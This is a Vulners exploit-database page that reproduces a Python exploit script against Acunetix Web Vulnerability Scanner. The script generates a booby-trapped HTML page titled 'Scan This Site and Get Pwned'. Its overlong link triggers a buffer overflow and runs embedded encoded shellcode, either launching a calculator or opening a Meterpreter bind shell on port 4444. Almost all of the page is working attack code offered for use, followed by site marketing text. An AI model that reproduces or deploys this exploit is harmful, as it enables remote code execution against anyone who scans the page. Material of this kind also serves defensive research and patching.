Lucene search
K

Acunetix-Web-Vulnerability-Scanner

🗓️ 04 Jan 2015 16:57:32Reported by An7iType 
exploitpack
 exploitpack
👁 13 Views

Choose payload for Calculator or Bind Shell with specific shellcodes

Code
while True:
    try:
        choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
    except ValueError:
        print "[!] Enter only a number"
        continue
         
    if choice == 1:
        shellcode =  ""
        shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
        shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
        shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
        shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
        shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
        shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
        shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
        shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
        shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
        shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
        shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
        shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
        shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
        shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
        shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
        shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
        shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
        shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
        shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
        shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
        shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
        shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
        shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
        shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
        shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
        shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
        shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
        shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
        shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
        shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
        shellcode += "\x65\x50\x41\x41"
        break
 
    elif choice == 2:
        # Modify this part with your own custom shellcode
        # msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
        shellcode =  ""
        shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
        shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
        shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
        shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
        shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
        shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
        shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
        shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
        shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
        shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
        shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
        shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
        shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
        shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
        shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
        shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
        shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
        shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
        shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
        shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
        shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
        shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
        shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
        shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
        shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
        shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
        shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
        shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
        shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
        shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
        shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
        shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
        shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
        shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
        shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
        shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
        shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
        shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
        shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
        shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
        shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
        shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
        shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
        shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
        shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
        shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
        shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
        shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
 
        print "[+] Connect on port 4444"
        break
    else:
        print "[-] Invalid Choice"
        continue
 
head = ("<html>\
        <body>\
        <center><h1>Scan This Site and Get Pwned :)</h1></center><br>")
junk = ("\
        <a href= \"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
        AAAAAAA")
edx = "500f"
junk2 = "BBBB"
# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
eip = "\x49\x63\x52\x4d"
 
shellcode += "\">"
tail = ("<img src=\"http://i.imgur.com/BimAoR0.jpg\">\
        </body>\
        </html>")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file" 
#EOF

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation